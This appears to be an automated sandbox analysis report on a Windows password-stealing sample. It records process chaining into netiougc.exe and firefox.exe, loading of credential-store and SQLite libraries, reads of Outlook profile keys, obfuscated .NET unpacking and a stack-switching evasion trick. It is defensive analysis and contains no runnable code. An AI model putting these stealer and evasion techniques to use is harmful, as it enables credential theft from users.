            Source: netiougc.exe, 00000007.00000002.2904358299.00000000033B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE field_info (form_signature INTEGER NOT NULL, field_signature INTEGER NOT NULL, field_type INTEGER NOT NULL, create_time INTEGER NOT NULL, UNIQUE (form_signature, field_signature))8D;
            Source: indent PWS-020199.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeProcess created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"
            Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"Jump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeProcess created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\indent PWS-020199.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: indent PWS-020199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: indent PWS-020199.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: indent PWS-020199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: netiougc.pdbGCTL source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897417864.000000000063E000.00000002.00000001.01000000.0000000C.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2904164622.000000000063E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: WsRG.pdb source: indent PWS-020199.exe
            Source: Binary string: wntdll.pdbUGP source: indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: indent PWS-020199.exe, indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: WsRG.pdbSHA256 source: indent PWS-020199.exe
            Source: Binary string: netiougc.pdb source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: indent PWS-020199.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs.Net Code: wHpy2kyWQL System.Reflection.Assembly.Load(byte[])
            Source: 7.2.netiougc.exe.402cd08.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 8.2.lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe.328cd08.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 8.0.lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe.328cd08.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 10.2.firefox.exe.21fcd08.0.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: indent PWS-020199.exeStatic PE information: 0xCB5C881E [Fri Feb 11 21:03:26 2078 UTC]
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040183A push ebp; ret 2_2_00401848
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004020D4 push ss; ret 2_2_004020E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00418240 push FFFFFFAAh; retf 2_2_0041824C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004032C0 push eax; ret 2_2_004032C2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00404BF7 push cs; retf 2_2_00404C04
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A393 push ss; iretd 2_2_0041A497
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040CBA0 push es; retf 2_2_0040CBA9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00401C71 push ebp; ret 2_2_00401C8A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040D425 push eax; iretd 2_2_0040D427
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A4D6 push ebp; retf 2_2_0041A553
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A4E3 push ebp; retf 2_2_0041A553
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A489 push ss; iretd 2_2_0041A497
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A546 push ebp; retf 2_2_0041A553
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00417DAD push eax; ret 2_2_00417DB6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00401647 push ebp; ret 2_2_00401648
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00417EB3 push eax; iretd 2_2_00417EB4
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040CF9F push eax; ret 2_2_0040CFEF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00417FA0 push eax; ret 2_2_00417FA5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0148225F pushad ; ret 2_2_014827F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014827FA pushad ; ret 2_2_014827F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B09AD push ecx; mov dword ptr [esp], ecx2_2_014B09B6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0148283D push eax; iretd 2_2_01482858
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0148135E push eax; iretd 2_2_01481369
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039E09AD push ecx; mov dword ptr [esp], ecx7_2_039E09B6
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224BF0 push eax; iretd 7_2_03224BF1
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224AEA push eax; ret 7_2_03224AF3
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224F7D push FFFFFFAAh; retf 7_2_03224F89
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03232F50 push es; retf 7_2_03232F83
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0322AF9E push edx; iretd 7_2_0322AFAD
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224CDD push eax; ret 7_2_03224CE2
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03227220 push ebp; retf 7_2_03227290
            Source: indent PWS-020199.exeStatic PE information: section name: .text entropy: 7.919292677582139
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, TRPo2wBCYPfKutFuFS.csHigh entropy of concatenated method names: 'wGdKU0Vyod', 'X7wKdGHFIv', 'AOCK42TKBs', 'XxeKF4nnfA', 'SnGKOoeqA7', 'LmkKMHbZty', 'k3hKwJCRQK', 'dLxKAAJ3lN', 'E84KrppEHB', 'uHFKk0cwKg'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xUdoI5QQOPp2AHoaxG.csHigh entropy of concatenated method names: 'SPXEs1nQn3', 'h83E7qpbub', 'NdbEj9K5Dq', 'Fa0ETJFvaU', 'RGAEOGCkRT', 'KOEEMI0wFQ', 'f46wrIG7Hvfus56hWQ', 'G4SItbPsFQuAe8On6U', 'IwdEEKCf4g', 'kEfEpqGe4y'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, oUGQ5e0Ew7Jp6LNjw7.csHigh entropy of concatenated method names: 'DNbZgYrNWx', 'RgeZGKZpj9', 'NuuZuX4vM8', 'VikZsQIRPB', 'wfjZ7jPoGW', 'xUiucVoTV0', 'qLmuIeRqfG', 'VBjuXuKQl2', 'M2YuqTgPj3', 'dXyuQjEsLR'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, z6XjBRPtbTRZOdnrBM6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 's95kLmhbiG', 'a8ckJv6uXw', 'E7oklSGf8c', 'lHIkvdysGu', 'zATkc3S9NQ', 'AARkI00MER', 'PlskXTDRAw'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, kZcXbVPIw1Zn6RfNW6s.csHigh entropy of concatenated method names: 'rhYrh5ydZJ', 'yRyrbRB28J', 'oEIr2I0X6X', 'jg5rUKpauG', 'MlGr3kU7uo', 'Fsardw5JB8', 'W9rrBh0Nt1', 'evlr4fXWhy', 'ud5rFfQS1k', 'Grcr5I5rnH'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, uRtvZ7KOiw6njkygik.csHigh entropy of concatenated method names: 'zkXo4FNTon', 'tLgoFoSTSe', 'C7CoawrJRx', 'hL5oiCh9jR', 'BTOo0jXHJG', 'nsvoC5N4Mi', 'FLloS681hJ', 'etmofQU1Ss', 'Hllo8EdYGX', 'iEGoNb3vQU'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, a1HGTdPPnnu21Q9w4AJ.csHigh entropy of concatenated method names: 'ToString', 'cbgkpECEvi', 'yDQkyp0dWO', 'W3gkgX5cGW', 'y7ok1lSV89', 'YjakGPHGIy', 'FFEkKj1Ot9', 'vaCkuUvZEb', 'jxdAQaiTspehurA85rs', 'MUlYfmimKI2Ai3mWRde'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, te5SHnzAd3hBY88q4A.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 's6BroUUqMe', 'PMXrOLuuwb', 'qB2rMZSCTk', 'kfarwwdWc3', 'GOQrAuRfmE', 'zxvrr6ZyqU', 'okWrk8DyIF'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, qE8I3ju4oDTZHje92X.csHigh entropy of concatenated method names: 'uqJO8hhp5c', 'iWdOH6tm1d', 'bXfOLm8UJc', 'f1iOJnpCAT', 'hVxOi6a9VF', 'MIlOm4ZEad', 'lwEO0701sy', 'PWiOCWhkQL', 'xtSO6W2W6O', 'zBPOSuMTjJ'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, WVQI0tJtK8th22NnfE.csHigh entropy of concatenated method names: 'Dispose', 'GK8EQEG7ne', 'mWlYiHxNW3', 'sZgPPRbJ7t', 'TJ6E9XAiHZ', 'U6QEzmdw6j', 'ProcessDialogKey', 't7RYDiU8Tp', 'HyEYEFPrah', 'MfuYYCXsw5'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csHigh entropy of concatenated method names: 'cuepg3LgHJ', 'Rn5p1UagS9', 'JF9pGUXGaV', 'AeUpKP62Zo', 'bWZpuLQFyY', 'jVBpZYbdFw', 'eNCpsXAImW', 'CsAp78phdH', 'pDjptWnK9q', 'erCpjWL9de'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, vOKSoOb1PxLDCtSJ1V.csHigh entropy of concatenated method names: 'pnHAa4UoFY', 'tAHAiWMLyA', 'A3rAmrb6pw', 'rJEA0UGiDj', 'rFvAL1fNw1', 'y2PACTyX09', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, aNGB1Sr6aGUuEYu12d.csHigh entropy of concatenated method names: 'FAqGLAurfT', 'XD4GJvcbnF', 'MMsGl56nBT', 'dAuGvMIZJ1', 'E2DGcdsJDI', 'DqmGIxTQN7', 'LxDGXaVS4P', 'RiUGqcHlcp', 'ANeGQOhn81', 'I4yG9TEZK1'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, LwKIDL50g1puPD1nh8.csHigh entropy of concatenated method names: 'nwbA1aNLMN', 'Y61AGCabGr', 'N25AKFf9XW', 'qQQAuY052Y', 'fxZAZCYCUf', 'KtoAsgPSPZ', 'ElTA77VMRQ', 'aSOAtxbOmo', 'HYiAj1674B', 'tM1ATxHiwv'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, wJJGOwYdKbSmQA13Wr.csHigh entropy of concatenated method names: 'JCqwqtEevf', 'twww9WY2XD', 'IDLAD9bOei', 'RT0AEPV3WK', 'f4FwNWkCfT', 'yhnwHt7mEk', 'N9rwWhTi7F', 'ScZwLdigKL', 'nVHwJPR5G1', 'NYCwlnOZpb'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, iR6tAtsgCB0s6FK2ok.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EbyYQqHuKJ', 'wZcY9LofV2', 'BspYzHeOvi', 'zvxpDhRdAW', 'tfGpE7BA7X', 'yw5pYKlKUs', 'V1epppZxfg', 'PEXXa6zPGJDgBwgLfk'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, bMPrPffQ9OiSRGiWPT.csHigh entropy of concatenated method names: 'Mkys1n8bPh', 'f42sKt9yGN', 'sQEsZlqxuT', 'dHkZ9Lpa1E', 'c7JZzwgFiv', 'jjfsDER1wR', 'uZgsEmO7EV', 'tDQsY4j9LG', 'AcRspngvsj', 'TlQsygp7fh'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, WTZTT21bY9pi5y4yFY.csHigh entropy of concatenated method names: 'fJL2IGqrm', 'xXKUmHFNK', 'cNrdYW0sG', 'EEdBGpdHs', 'dH5FAx408', 'NuA5W64O5', 'QRSifEsxPhQ59SBFx6', 'FhlNtpcPcJN63rpKfm', 'SrjAtWEPj', 'k0skxk1lg'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, f8fMwD31ixQMxE585f.csHigh entropy of concatenated method names: 'ToString', 'ATaMN6uIVt', 'Wr5MimOZRQ', 'cHcMmCjno1', 'ulJM09xpPx', 'PROMCeTeBv', 'Px4M6b4oJo', 'EJoMSwRBfF', 'BPgMfTfXTT', 'YZIMns7qfb'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, K6opXMcVRSp2cGSA44.csHigh entropy of concatenated method names: 'fpwshaRTpo', 'MfLsb46Odv', 'iNHs2JE8qO', 'zIwsUawuMe', 'SvUs38BMbT', 'R7jsdHwXCn', 'GI8sBmNrDk', 'FI0s4g7EyK', 'amZsFVV7je', 'fhgs5pBMVb'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, fPtj7h4VVYYJfdoUsx.csHigh entropy of concatenated method names: 'mecrEBMGLO', 'kPYrptxieD', 'CUhry2llCj', 'I8Vr1dKUaL', 'tnErGgx0bO', 'RWRruCq6TH', 'QuNrZwaTG5', 'qUEAX3UVoh', 'D2KAqOqEMu', 'O38AQj7Y8E'
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netiougc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
